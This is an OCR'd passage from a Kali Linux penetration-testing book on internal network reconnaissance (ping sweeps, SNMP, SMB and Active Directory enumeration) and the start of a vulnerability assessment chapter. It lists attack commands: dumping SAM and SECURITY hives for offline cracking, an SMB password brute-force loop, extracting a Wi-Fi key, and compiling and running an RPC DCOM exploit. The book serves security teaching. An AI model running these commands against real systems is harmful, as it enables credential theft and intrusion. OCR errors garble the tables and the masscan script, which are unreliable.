| No. | Number 328698995 220 85.328729516 221 85.328734265 222 85.341873921 223 85.3457273730 224 85.343447397 225 85.344107103 226 85.345747059 227 85.345701971 228 85.345991325 229 85.345991325 | 500000 CadmusCo_ff:04:71 192.100.0.100 192.108.0.129 CadmusCo_ff:04:71 D-LinkIn_09:f1:00 CadmusCo_78:77:ca D-LinkIn_09:f1:00 fe80::dd11:9afe:af4. fe80::3000:0136:40b. 192.108.0.129 192.108.0.120 | Destination Broadcast 192,166,8,255 192,168,8,255 Broadcast CadrusCo_ff:04:71 Broadcast CadrusCo_78:77:ca ff02:15 ff02:15 224,0,0,22 224,0,0,22 | Protocol A&P NSNS NBNS A&P A&P ICNPv6 ICNPv6 ICNPv6 ICNPv6 ICNPv6 ICNPv6 | Length Info 60 Who has 192.168.0.1457 Tell 192. 92 Name query NS ISATAP<00> 92 Name query NS ISATAP<00> 92 Name query NB ISATAP<00> 60 Who has 192.168.0.17 Tell 192.1. 00 192.105.0.1 is at 1c:5f:2b:09:f. 00 Nulticast Listener Report Messa. 00 Nulticast Listener Report Messa. 00 Nulticast Listener Report Messa. 00 Nulticast Listener Report Messa. 00 Nembership Report / Leave group. 60 Nembership Report / Leave group. |
| | 230 85.346684934 231 85.347376527 232 85.347471457 239 85.347597773 234 85.347597778 234 85.347597774 235 85.348169774 | 192.108.0.186 fem0:/ddl198fe.af4. fe80::3500:6136:49b. 192.188.0.129 192.168.0.106 fe80::ddl19afe:af4. | 224.0.0.22 ff02: 10 ff02: 15 224.0.0.22 224.0.0.22 ff02: 1:3 | IGMPVS ICMPV6 ICMPV6 IGMPV3 IGMPV3 LUMMR | 68 Membership Report / Leave group. 90 Multicast Listener Report Messa. 58 Multicast Listener Report Messa. 68 Membership Report / Join group - 60 Membership Report / Join group - 95 Standard query 8x3eci ANY metas. |

We will now see traffic on **DNS**, **NBNS**, **BROWSER**, and other protocols that might potentially reveal hostnames, **VLAN** information, domains, and active subnets in the network. We will be discussing more attacks specific to sniffing in **Chapter 11**, *Exploitation*.

Identification and enumeration of internal network hosts

If the attacker's system is already configured with the DHCP, it will provide a few bits of information that are very useful to map the internal network. The DHCP information can be obtained by typing *ifconfig* in the Kali Terminal as shown in the following screenshot. You should be able to see the following information:

```
root@kali:~# ifconfig
```

```
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
       inet 10.10.115.108 netmask 255.255.240.0 broadcast 10.10.127.255
       inet6 fe80::a634:d9ff:fe0a:b93c prefixlen 64 scopeid 0x20<link>
       ether a4:34:d9:0a:b9:3c txgueuelen 1000 (Ethernet)
       RX packets 536415 bytes 761467023 (726.1 MiB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 236433 bytes 14338324 (13.6 MiB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
       inet 127.0.0.1 netmask 255.0.0.0
       inet6 ::1 prefixlen 128 scopeid 0x10<host>
       loop txqueuelen 1 (Local Loopback)
       RX packets 80 bytes 4892 (4.7 KiB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 80 bytes 4892 (4.7 KiB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
oot@kali:~# cat /etc/resolv.conf
domain superdude.ad
search superdude.ad
nameserver 10.10.65.181
nameserver 10.10.65.110
nameserver 10.10.65.91
```

• inet: The IP information obtained by the DHCP server should provide us with at least one active subnet which can be utilized to identify the list of

live systems and services through different scanning techniques.

- netmask: This information can be utilized to calculate the subnet ranges. From the previous screenshot, we have 255.255.240.0, which means CIDR is /20 and potentially we can expect 4094 hosts on the same subnet.
- **Default gateway:** The IP information of the gateway will provide the opportunity to ping other similar gateway IP's. For example, if your default gateway IP is 192.168.1.1 by using ping scans attackers may be able to enumerate other similar IPs such as 192.168.2.1, 192.168.3.1, and so on.
- **Other IP address**: DNS information can be obtained by accessing the /etc/resolv.conf file. The IP addresses in this file are commonly addressed in all of the subnets and domain information will also be automatically available in the same file.

Native MS Windows commands

The following section provides a list of useful commands during a penetration testing or red teaming exercise, even when having physical access to the system or having a remote shell to communicate to the target. These commands are not limited to the following:

| Command | Sample | Description |
|-----------|--|--|
| nslookup | nslookup Server nameserever.google.com Set type=any ls -d anydomain.com | nslookup is used to query the DNS. The sample command does DNS zone transfer using nslookup. |
| net view | net view | This displays a list of computers/domains and other shared resources. |
| net share | net share list="c:" | This manages the shared resources and displays all information about the shared resources on the local system. |
| net use | net use \\[targetIP] [password] /u:[user] | This connects to any system on the same network; it can |

| | net use \\[targetIP]\[sharename] [password] /u:[user] | also be used for retrieving a list of network connections. |
|----------|---|--|
| net user | net user [UserName [Password *] [options]] [/domain] net user [UserName {Password *} /add [options] [/domain]] net user [UserName [/delete] [/domain]] | This displays information regarding users and performs activity related to user accounts. |
| arp | arp /a arp /a /n 10.0.0.99 arp /s 10.0.0.80 00-AA-00-4F-2A-9C | This displays and modifies any entries in the ARP cache. |
| route | route print route print 10.* route add 0.0.0.0 mask 0.0.0.0 192.168.12.1 route delete 10.* | Similar to ARP, route can be utilized to understand the local IP routing and modify this information. |
| netstat | netstat -n -o | This displays all active TCP connections and ports on the local system, that is to say, listening on which Ethernet and IP routing tables (IPv4 and IPv6) and statistics. |
| nbtstat | nbtstat /R nbtstat /S 5 | This displays NETBIOS information, normally utilized to identify a particular MAC address of an |

| | nbtstat /a Ip | IP, which can be utilized in MAC spoof attacks. |
|------|---|---|
| wmic | wmic process get caption,executablepath,commandline wmic netshwlan profile = "profilename" key=clear | wmic is utilized for all typical diagnostics an attacker can perform; for example, a system's Wi-Fi password can be extracted in a single command. |
| reg | reg save HKLM\Security sec.hive reg save HKLM\System sys.hive reg save HKLM\SAM sam.hive reg add [\\TargetIPaddr\] [RegDomain][\Key] reg export [RegDomain]\[Key] [FileName] reg import [FileName] reg query [\\TargetIPaddr\] [RegDomain]\[Key] /v [Valuename!] | The reg command is used by most attackers to save registry hives to perform offline password attacks. |
| for | for /L %i in (1,1,10) do echo %ii && ping -n 5 IP for /F %i in (password.lst) do @echo %i& @net use \\[targetIP] %i /u:[Username] 2>nul&& pause && echo [Username] :%i>>done.txt | The for loop can be utilized in Windows to create a portscanner or enumeration of accounts. |

ARP broadcasting

During an internal network active reconnaissance, the entire local network can be scanned using nmap (nmap -v -sn IPrange) to sniff the ARP broadcasts. In addition, Kali has arp-scan (arp-scan IP range) to identify a list of hosts that are alive on the same network.

The following screenshot of Wireshark provides the traffic generated at the target when arp-scan is run against the entire subnet. This is considered to be a non-stealthy scan:

| h | ch a damay filter | 900 | | | | Provession |
|---|--------------------------|-------------------|-------------------|----------|-------------|---------------------------|
| | a contract of the second | | | - | | and a second |
| | line | Source. | Destination | Protocos | Length into | |
| | 103 32.051229233 | IntelCor_Scicc164 | Broadcast | AMP | on who has | 192,168.0.143? Tell 192. |
| | 104 32.001270300 | CedfunCo_08:fc:e7 | IntelCor_Scion:04 | ARP | 42 192.164 | .0.143 is at 30:00-27:00 |
| | 105 42.179222891 | D-LinkIn_09:f1:b8 | IntelCor_0a:b9:3c | ARP | 68 192.168 | .0.1 is at 1c:5f:2b:09:f. |
| | 180 51.810594558 | IntelCor_8c:cc:64 | Broadcast | ARP | 68 Who has | 192.108.0.0? Tell 192.1. |
| | 107 51.818714251 | IntelCor_8c:cc:64 | Broadcast | ARP | 66 Who has | 102.168.0.17 Tell 102.1 |
| | 108 51.810717524 | IntelCor_8c:cc:64 | Broadcast | ARP | 60 Who has | 192.168.0.2? Tell 192.1. |
| | 109 31.810719344 | IntelCor_8c:cc:64 | Brondcast | ARP | 60 Who has | 192,168.0.3? Tell 192.1. |
| | 110 01.016721088 | IntelCor_Sc:cc:64 | Broadcast | ARP | 66 Who has | 102.168.0.47 Tell 102.1 |
| | 111 51.816722980 | IntelCor_Sc:cc:64 | Broadcast | ARP | 68 Who has | 192.168.0.57 Tell 192.1. |
| | 112 51, 016724678 | IntelCor_8c:cc:64 | Broadcast | ARP | 66 Who has | 192.168.0.0? Tell 192.1. |
| | 113 51,918954760 | IntelCor_8c:cc:64 | Broadcast | ARP | 68 Who has | 192.168.0.117 Tell 192. |
| | 114 51.918984815 | IntelCor actoc:04 | Broadcast | ARP | op who has | 192.108.0.147 Tell 192. |
| | 115 51.918988282 | IntelCor_Sc:cc:64 | Groadcast | ARP | 66 Who has | 192.168.0.15? Tell 192 |
| | 115 52.840527472 | IntelCor_Scict:64 | Broadcast | ARP | 68 Who has | 192.168.0.2437 Tell 192. |
| | 117 52.848548652 | IntelCor_8c:cc:04 | Broadcast | ARP | 68 who has | 192.168.0.244? Tell 192. |
| | 118 52.840650411 | IntelCor_Sciec:64 | Broadcast | ARP | 60 who has | 192.168.0.245? Tell 192. |
| | 119 52:840652836 | IntelCor Scicc:64 | Broadcast | ARP | 60 who has | 192.168.0.248? Tell 192. |
| | | T-L-IN- T | Anna Lana | 4.004 | and the | sen sen a este with sen |

Ping sweep

Ping sweep is the process of pinging an entire range of network IP addresses or individual IPs to find out whether they're alive and responding. An attacker's first step in any large-scale scanning is to enumerate all of the hosts that are responding. Penetration testers can leverage <code>fping</code> or <code>nmap</code> or even write custom Bash scripts to do the activity:

```
fping -g IPrange
nmap -sP IPrange
for i in {1..254}; do ping -c 1 10.10.0.$i | grep 'from'; done
```

Sometimes, attackers can get a roadblock during the ping sweep due to the firewall that blocks all of the ICMP traffic. In case of an ICMP block, we can utilize the following command to identify alive hosts by specifying a specific list of port numbers during the ping sweep:

nmap -sP -PT 80 IPrange

The following screenshot shows all of the live hosts that were discovered using the fping tool:

```
ot@kali: # fping -g 192.168.0.1/24
192.168.0.1 is alive
192.168.0.21 is alive
192.168.0.18 is alive
192.168.0.10 is alive
192.168.0.13 is alive
192.168.0.100 is alive
192.168.0.200 is alive
ICMP Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.4
ICMP Host Unreachable from 192,168.0.21 for ICMP Echo sent to 192,168.0.4
ICMF Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.3
ICMF Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.3
ICMP Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.2
ICMP Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.2
ICMP Host Unreachable from 192,168.0.21 for ICMP Echo sent to 192.168.0.6
ICMP Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.6
ICMP Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.5
ICMP Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.5
ICMP Host Unreachable from 192.168.0.21 for ICMP Echo sent to 192.168.0.9
```

Using scripts to combine masscan and nmap scans

The speed and reliability of masscan and nmap ability to enumerate in detail is a great combination to use in our goal-based penetration testing strategy. In this section, we will write a small script that can save time and provide more accurate results that can be used during exploitation and identifying the right vulnerabilities:

```
#!/bin/bash
function helptext {
  echo "enter the massnmap with the file input with list of IP address ranges"
if [ "$#" -ne 1 ]; then
  echo "Sorry cannot understand the command"
  helptext>&2
  exit 1
elif [ ! -s $1 ]; then
  echo "ooops it is empty"
  helptext>&2
  exit 1
fi
if [ "$(id -u)" != "0" ]; then
  echo "I assume you are running as root"
  helptext>&2
  exit 1
fi
for range in $(cat $1); do
  store=(echo \ range | sed - e 's/\//_/g')
  echo "I am trying to create a store to dump now hangon"
  mkdir -p pwd/$store;
  iptables -A INPUT -p tcp --dport 60000 -j DROP;
  echo -e "\n alright lets fire masscan ****"
  masscan --open --banners --source-port 60000 -p0-65535 --max-rate 15000 -oBpwd/$store/
  if [ ! -s ./results/$store/masscan-output.txt ]; then
     echo "Thank you for wasting time"
  else
    awk'/open/ {print $4,$3,$2,$1}' ./results/$store/masscan-output.txt | awk'
/.+/{
  if (!($1 in Val)) { Key[++i] = $1; }
  Val[$1] = Val[$1] $2 ",";
  END{
  for (j = 1; j <= i; j++) {
    printf("%s:%s\n%s", Key[j], Val[Key[j]], (j == i) ? "" : "\n");
}'>}./results/$store/hostsalive.csv
for ipsfound in $(cat ./results/$store/hostsalive.csv); do
  IP=$(echo $TARGET | awk -F: '{print $1}');
  PORT=$(echo $TARGET | awk -F: '{print $2}' | sed's/,$//');
  FILENAME=$(echo $IP | awk'{print "nmap_"$1}');
```

```
nmap -vv -sV --version-intensity 5 -sT -O --max-rate 5000 -Pn -T3 -p $PORT -oA ./resul
done
fi
done
```

Now, save the file into anyname.sh and then chmod +x anyname.sh. Next, run ./anyname.sh fileincludesipranges.

Upon executing the preceding script, you should be able to see the following screenshot:

```
root@kali: # ./massnmao.sh ipran.txt
I am trying to create a store to dump now hangon
alright lets fire masscan ****
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2017-03-05 08:29:25 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [65536 ports/host]
ate: 3.69-kpps, 0.67% done, 0:55:45 remaining, found=1
```

Taking advantage of SNMP

SNMP stands for Simple Network Management Protocol; traditionally, this is used for collecting information about configuration of network devices such as printers, hubs, switches, routers on internet protocol, and servers. Attackers can potentially take advantage of SNMP that runs on UDP port 161 (by default) when it is poorly configured or left out with default configuration having a default community string. SNMP has been developed from 1987: version 1 had plain text passwords in transit, version 2c had improved performance, but still plain text passwords, and now the latest v3 encrypts all of the traffic with message integrity.

There are two types of community strings utilized in all versions of SNMP:

- **Public**: Community string is used for read-only access
- **Private**: Community string is used for both read and write access

The first step that attackers would look for is any identified network device on the internet and find if a public community string is enabled so that they can pull out all of the information specific to the network and draw a topology around it to create more focused attacks. These issues arise since most of the time IPbased **Access Control Listing (ACL)** is often not implemented or not used.

Kali Linux provides multiple tools to perform the SNMP enumeration; attackers can utilize SNMP walk to understand the complete information SNMP steps as shown in the following screenshot:

snmpwalk -c public ipaddress

Attackers can also utilize Metasploit to perform SNMP enumeration, by using the /auxiliary/scanner/snmp/snmpenum module as shown in the following screenshot. Some systems have SNMP installed purely ignored by the system administrators:

```
msf > use auxiliary/scanner/snmp/snmp enum
msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192,168.0.115
rhosts => 192.168.0.115
msf auxiliary(scanner/snmp/snmp_enum) > run
[+] 192.168.0.115, Connected.
[*] System information:
Host IP
                                 : 192.168.0.115
Hostname
                                : metasploitable3-win2k8.Mastering.kali.thirdedition
                    : Hardware: Intel64 Family 6 Model 142 Stepping 9 AT/A
Description
on 6.1 (Build 7601 Multiprocessor Free)
Contact
                            : -
: 00:06:58.20
: 00:01:37.88
: 2019-1-20 09:13:20.3
Location
Uptime snmp
Optime system
System date
[*] User accounts:
["sshd"]
 "Guest"]
```

Attackers will be able to extract all of the user accounts by using account

enumeration modules within Metasploit, as shown in the following screenshot:

| Name | Current Setting | Required | Description |
|---|---|--------------------------|---|
| COMMUNITY | public | уев | SNMP Community String |
| RETRIES | 1 | Yes. | SNMP Retries |
| RHOSTS | | Yet2 | The target address range or CIDR identifier |
| RPORT | 1.61 | yes | The target port (UDP) |
| THREADS | I | yes | The number of concurrent threads |
| TIMEOUT | 1 | yes | SNMP Timeout |
| VERSION | 1 | yes | SNMP Version <1/2c> |
| af auxiliary hosts => 192 wsf auxiliary | y{scanner/snmp/snm 2.168.0.115 y{scanner/snmp/snm | p_enumuser p_enumuser | 8) > set rhosts 192.168.0.115 8) > run |

Windows account information via SMB (Server Message Block) sessions

Traditionally, during Internal network scanning, it is very likely that attackers exploit the internal SMB sessions that are most commonly used. In the case of external exploitation, attackers can engage <code>nmap</code> to perform the enumeration, but this scenario is very rare. The following <code>nmap</code> command will enumerate all of the remote users on the Windows machine. This information normally creates lots of entry points much like brute forcing and password guessing attacks in later stages:

nmap --script smb-enum-users.nse -p445 <host>

Attackers may also utilize the Metasploit

module, auxiliary/scanner/smb/smb_enumusers, to perform the activity. The following screenshot shows the successful enumeration of users on a Windows system running Metasploitable3:



This can be achieved either by having a valid password guess to the system or by brute forcing the SMB logins.

Locating network shares

One of the oldest attacks that penetration testers these days forget is the NETBIOS null session, which will allow them to enumerate all of the network shares:

```
smbclient -I TargetIP -L administrator -N -U ""
```

Also, we can utilize enum4linux similar to enum.exe from formerly bindview.com, which is now taken over by Symantec; this tool is normally for enumerating information from Windows and Samba systems:

enum4linux.pl [options] targetip

The options are the following (such as enum):

- -u: Get user list
- -M: Get machine list
- -s: Get share list
- -P: Get password policy information
- -G: Get group and member list
- -d: Be detailed; applies to -u and -s
- -u user: Specify username to use (default "")
- -p pass: Specify password to use (default "")

The tool is more aggressive in scanning and identifying the list of domains along with the Domain SID, as shown in the following screenshot:

```
cotEkali: # enum4linux 192.168.0.16
Starting enum4linux v0.8.9 { http://labs.portcullis.co.uk/application/enum4linux
 / ) on Sun Sep 30 16:20:29 2018
         Target Information |
  .
                        And the second design of the second se
Target ..... 192.168.0.16
RID Range ..... 500-550,1000-1050
Username ..... **
Password ..... **
Fnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
  100
                        Enumerating Workgroup/Domain on 192.168.0.16
  -
                                                                                             [+] Got domain/workgroup name: WORKGROUP
           Nbtstat Information for 192.168.0.16
                                                                                                 10000
Looking up status of 192.168.0.16

      UBUNTU
      <00> -
      B <RCTIVE>
      Workstation Service

      UBUNTU
      <03> -
      B <RCTIVE>
      Messenger Service

      UBUNTU
      <20> -
      B <RCTIVE>
      File Server Service

      ..__MSEROWSE__.
      <01> - <GROUF> B <ACTIVE>
      Master Browser
```

Reconnaissance of active directory domain servers

Often during an internal penetration testing activity, penetration testers will be provided with a username and password. In real-world scenarios, the attackers are inside the network and an attack scenario would be what they could do with normal user access and how they elevate the privileges to compromise the enterprise domain.

Kali provides a default installed <code>rpcclient</code> that can be utilized to perform more active reconnaissance on an active directory environment. This tool provides multiple options to extract all of the details about domain and other networking services, which we will be exploring in <code>chapter 10</code>, *Exploitation*.

The following screenshot provides the enumeration of lists of domains, users, and groups:

root@kali:~# rpcclient -U "vagrant" 192.168.0.15 Enter WORKGROUP\vagrant's password: rpcclient \$> enumdomains name: [METASPLOITABLE3] idx: [0x0] name:[Builtin] idx:[0x0] rpcclient \$> enumdomusers user: [Administrator] rid: [0x1f4] user:[anakin skywalker] rid:[0x3f3] user:[artoo detoo] rid:[0x3ef] user:[ben kenobi] rid:[0x3f1] user: [boba fett] rid: [0x3f6] user:[chewbacca] rid:[0x3f9] user:[c three pio] rid:[0x3f0] user:[darth vader] rid:[0x3f2] user:[greedo] rid:[0x3f8] user:[Guest] rid:[0x1f5] user:[han solo] rid:[0x3ee] user:[jabba hutt] rid:[0x3f7] user:[jarjar binks] rid:[0x3f4] user:[kylo ren] rid:[0x3fa] user:[lando calrissian] rid:[0x3f5] user:[leia organa] rid:[0x3ec] user: [luke skywalker] rid: [0x3ed] user:[sshd] rid:[0x3e9] user:[sshd server] rid:[0x3ea] user:[vagrant] rid:[0x3e8]

Using comprehensive tools (SPARTA)

To speed up the penetration tester's goal, Kali has SPARTA, which combines multiple tools such as nmap and nikto and allows us to configure. In order to configure SPARTA, you must edit the sparta.conf file located at /etc/Sparta/. When the application is opened, it will check for the configuration; if there is no configuration, it will pick up the default configuration values.

The following items are available in the configuration:

- tool: This is the unique identifier of the command-line tool, for example, nmap
- label: This is the text that appears on the context menu
- command: Normally this should be in non-interactive mode and the full command that you will run using a tool
- services: These are the list of services that need to be run during the automatic run; for example, if you configure to run nmap and when port 80 is identified automatically run nikto
- Protocol: Either TCP or UDP are the services that the tool should run on

An example to configure SPARTA

To configure the nikto tool as a port action, we would need to add the following line to the [PortActions] Section in sparta.conf:

|nikto=Run nikto, nikto -o [OUTPUT].txt -p [PORT] -h [IP], "http,https"

The following screenshot shows the SPARTA in action against a local subnet. By default, it performs nmap full portscan, nikto, on identified web services port and takes a screenshot if available:

| File He | etp. | | | | SPARTA 1 | LO.3 (BETA) | untitled - /root | 1 | | 0 0 |
|---------|-------------|-----------|-------------|-------|------------------|-------------|------------------|----------------------|----------|-----|
| Stan B | Brute | | | | | | | | | |
| Hosts | Services | Tools | Servic | es Sc | ripts kformation | Notes ni | an (80/tep) 🖽 | nikto (443/tcp) (II) | | |
| OS: | He | nst. | | Port | Protocol | State | Name | V | ersion | |
| 100 | 192:168:0.1 | 8 | • | 80 | tcp | open | http- | lighttpd | | |
| 0 | 192.168.0.1 | 10 | | 443 | tep | open | http | lighttpd | | |
| | 192.168.0.1 | 8 | | | | | | | | |
| 0 | 192.168.0.1 | 15 | | | | | | | | |
| 0 | 192.168.0.3 | 16 | | | | | | | | |
| 0 | 192.168.0.3 | 202 | | | | | | | | |
| | 192.168.0.3 | 14 | | | | | | | | |
| | | | | | | | | | | |
| | | | | | | | | | | |
| | | 9.15 | b] | | | | | | | |
| | | | | | | | | | | |
| Log | | | | | | | | | | |
| Fi | rogress | | Tool | | Host | | Start time | End time | Status | |
| | - | screensh | ot (80/tcp) | | 192.168.0.16 | 30 Se | p 2018 16:25:35 | 30 Sep 2018 16:25:35 | Finished | |
| 100 | _ | nikto (44 | 3/tcp) | | 192.168.0.1 | 30 Se | p 2018 16:25:34 | 3 | Running | |
| | _ | nikto (80 | /tcp} | | 192.168.0.1 | 30 Se | p 2018 16:25:34 | | Running | |
| | _ | nikto JM | Ment. | | 143 168.0.16 | 30.5 | n 2018 16:35-34 | e | Dunining | |

Summary

Attackers might face a very real chance of their activities being identified; it will put them at risk. However, we have now explored different techniques that can be engaged during active reconnaissance. Attackers must ensure that there is a balance against the need to map a network, find open ports and services, and determine the operating system and applications that are installed. The real challenge for the attackers is to adopt the stealthy scanning techniques to reduce the risk of triggering an alert.

Manual approaches are normally used to create slow scans; however, this approach may not be always effective. Therefore, attackers take advantage of tools such as the Tor network and various proxy applications to hide their identity.

In the next chapter, we will explore more techniques and procedures on vulnerability assessments: how to utilize the scanners to identify the vulnerabilities that can be utilized as the potential candidates for the exploitation to move forward in achieving the objective.

Vulnerability Assessment

The goal of passive and active reconnaissance is to identify the exploitable target and vulnerability assessment is to find the security flaws that are most likely to support the tester's or attacker's objective (denial of service, theft, or modification of data). The vulnerability assessment during the exploit phase of the kill chain focuses on creating the access to achieve the objective—mapping of the vulnerabilities to line up the exploits and to maintain persistent access to the target.

Thousands of exploitable vulnerabilities have been identified, and most are associated with at least one proof-of-concept code file or technique to allow the system to be compromised. Nevertheless, the underlying principles that govern success are the same across networks, operating systems, and applications.

In this chapter, you will learn about the following:

- Using online and local vulnerability resources
- Vulnerability scanning with Nmap
- Lua scripting
- Writing your own Nmap script using **Nmap Scripting Engine** (**NSE**)
- Selecting and customizing multiple vulnerability scanners
- Installing Nexpose and Nessus
- Threat modeling in general

Vulnerability nomenclature

Vulnerability scanning employs automated processes and applications to identify vulnerabilities in a network, system, operating system, or application that may be exploitable.

When performed correctly, a vulnerability scan delivers an inventory of devices (both authorized and rogue devices), known vulnerabilities that have been actively scanned for, and usually a confirmation of how compliant the devices are with various policies and regulations.

Unfortunately, vulnerability scans are loud; they deliver multiple packets that are easily detected by most network controls and make stealth almost impossible to achieve. They also suffer from the following additional limitations:

- For the most part, vulnerability scanners are signature-based; they can only detect known vulnerabilities, and only if there is an existing recognition signature that the scanner can apply to the target. To a penetration tester, the most effective scanners are open source and they allow the tester to rapidly modify code to detect new vulnerabilities.
- Scanners produce large volumes of output, frequently containing falsepositive results that can lead a tester astray; in particular, networks with different operating systems can produce false-positives with a rate as high as 70 percent.
- Scanners may have a negative impact on the network; they can create network latency or cause the failure of some devices, It is recommended to tweak the scan by removing denial of service type plugins during initial scans.
- In certain jurisdictions, scanning is considered hacking, and may constitute an illegal act.

There are multiple commercial and open source products that perform vulnerability scans.

Local and online vulnerability databases

Together, passive and active reconnaissance identifies the attack surface of the target, that is, the total number of points that can be assessed for vulnerabilities. A server with just an operating system installed can only be exploited if there are vulnerabilities in that particular operating system; however, the number of potential vulnerabilities increases with each application that is installed.

Penetration testers and attackers must find the particular exploits that will compromise known and suspected vulnerabilities. The first place to start the search is at vendor sites; most hardware and application vendors release information about vulnerabilities when they release patches and upgrades. If an exploit for a particular weakness is known, most vendors will highlight this to their customers. Although their intent is to allow customers to test for the presence of the vulnerability themselves, attackers and penetration testers will take advantage of this information as well.

Other online sites that collect, analyze, and share information about vulnerabilities are as follows:

- The National Vulnerability Database, which consolidates all public vulnerability data released by the US Government, available at http://web.nvd .nist.gov/view/vuln/search
- Secunia, available at http://secunia.com/community/
- Packetstorm security, available at https://packetstormsecurity.com/
- SecurityFocus, available at http://www.securityfocus.com/vulnerabilities
- The Exploit database maintained by Offensive Security, available at https://
- For some 0-day vulnerabilities, penetration testers can also keep an eye on h ttps://0day.today/

The Exploit database is also copied locally to Kali and it can be found in the /usr/share/exploitdb directory.

To search the local copy of exploitdb, open a Terminal window and enter searchsploit and the desired search term(s) in the command prompt. This will invoke a script that searches a database file (.csv) that contains a list of all exploits. The search will return a description of known vulnerabilities as well as the path to a relevant exploit. The exploit can be extracted, compiled, and run against specific vulnerabilities. Take a look at the following screenshot, which shows the description of the vs FTPd vulnerabilities:

| Espinit Title | Path (/usr/share/exploitdb/) |
|---|--|
| <pre>STIM: - 'vaprintf()' Format Dirings Vaftpd 2.0.5 - 'CND' Authenticated Remote Hemory Consumption Vaftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) Vaftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) Vaftpd 2.3.2 - Denial of Service Vaftpd 2.3.4 - Backdoor Command Execution (Metasploit)</pre> | <pre>(exploits/linux/remote/204.c exploits/linux/dos/5814.pl exploits/windows/dos/31818.sh exploits/windows/dos/31819.pl exploits/linux/dos/16270.c exploits/anix/remote/17491.xb</pre> |

The search script scans for each line in the CSV file from left to right, so the order of the search terms is important; a search for oracle 10g will return several exploits, but 10g oracle will not return any. Also, the script is weirdly case sensitive; although you are instructed to use lowercase characters in the search term, a search for vsftpd returns no hits, but vs ftpd returns more hits with a space between vs and Ftp. More effective searches of the CSV file can be conducted using the grep command or a search tool such as Kwrite (apt-get install kwrite).

A search of the local database may identify several possible exploits with a description and a path listing; however, these will have to be customized to your environment, and then compiled prior to use. Copy the exploit to the /tmp directory (the given path does not take into account that the /windows/remote directory resides in the /platforms directory).

Exploits presented as scripts such as Perl, Ruby, and PHP authentication are relatively easy to implement. For example, if the target is a Microsoft IIS 6.0 server that may be vulnerable to a WebDAV remote aupass, copy the exploit to the root directory and then execute as a standard Perl script, as shown in the following screenshot:

root@kali:~# perl 8806.pl

```
$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01[at]gmail.com>
$ 25/05/2009
usage:
    perl $0 <host> <path>
example:
    perl $0 localhost dir/
    perl $0 localhost dir/
    perl $0 localhost dir/file.txt
```

Many of the exploits are available as source code that must be compiled before use. For example, a search for RPC-specific vulnerabilities identifies several possible exploits. An excerpt is shown in the following screenshot:

| <pre>root@kali:/usr/share/exploitdb# searchsploit '</pre> | 'rpe DCOM" |
|---|---|
| Exploit Title | Path (/usr/share/exploitdb/platforms) |
| Microsoft Windows Server 2000 - RPC DCON Int Microsoft Windows 8.1 - DCOM DCE/RPC Local N Microsoft Windows - 'RPC DCOM' Remote Buffer Microsoft Windows - 'RPC DCOM' Remote Exploi Microsoft Windows - 'RPC DCOM' Scanner (MS03 Microsoft Windows - 'RPC DCOM' Long Filename Microsoft Windows - 'RPC DCOM' Long Filename Microsoft Windows - 'RPC DCOM2' Remote Explo Microsoft RPC DCOM Interface - Overflow Expl Microsoft Windows - DCOM RPC Interface Buffe Windows - (DCOM RPC2) Universal Shellcode | /windows/dos/61.c /windows/local/37768.txt /windows/remote/64.c /windows/remote/66.c /windows/remote/69.c /windows/remote/70.c /windows/remote/76.c /windows/remote/76.c /windows/remote/97.c /windows/remote/100.c /windows/remote/103.c /windows/remote/16749.rb /windows/remote/22917.txt /windows/remote/22917.txt /win_x86/shellcode/13532.asm |

The RPC DCOM vulnerability identified as $_{76.c}$ is known from practice to be relatively stable. So, we will use it as an example. To compile this exploit, copy it from the storage directory to the $_{/tmp}$ directory. In that location, compile it using GCC with the command that follows:

|root@kali:~# gcc 76.c -o 76.exe

This will use the GNU Compiler Collection application to compile 76.c to a file with the output (-o) name of 76.exe, as shown in the following screenshot:

```
root@kali:/usr/share/exploitdb/platforms/windows/remote# cp 76.c /tmp
root@kali:/usr/share/exploitdb/platforms/windows/remote# cd /tmp
root@kali:/tmp# ls
76.c
root@kali:/tmp# gcc 76.c -o 76.exe
```

When you invoke the application against the target, you must call the executable (which is not stored in the /tmp directory) using a symbolic link as follows:

```
root@kali:~# ./76.exe
```

The source code for this exploit is well documented and the required parameters are clear at execution, as shown in the following screenshot:

```
root@kali:/tmp# ./76.exe
RPC DCOM exploit coded by .: [oc192.us]:. Security
Usage:
./76.exe -d <host> [options]
Options:
        -d:
                        Hostname to attack [Required]
                        Type [Default: 0]
                        Return address [Default: Selected from target]
        -r:
                        Attack port [Default: 135]
        -p:
                        Bindshell port [Default: 666]
        -1:
Types:
        0 [0x0018759f]: [Win2k-Universal]
        1 [0x0100139d]: [WinXP-Universal]
```

Unfortunately, not all exploits from the Exploit database and other public sources compile as readily as 76.c. There are several issues that make the use of such exploits problematic, even dangerous, for penetration testers, which are listed as follows:

• Deliberate errors or incomplete source code are commonly encountered as

experienced developers attempt to keep exploits away from inexperienced users, especially beginners who are trying to compromise systems without knowing the risks that go with their actions.

- Exploits are not always sufficiently documented; after all, there is no standard that governs the creation and use of code intended to be used to compromise a data system. As a result, they can be difficult to use, particularly for testers who lack expertise in application development.
- Inconsistent behaviors due to changing environments (new patches applied to the target system and language variations in the target application) may require significant alterations to the source code; again, this may require a skilled developer.
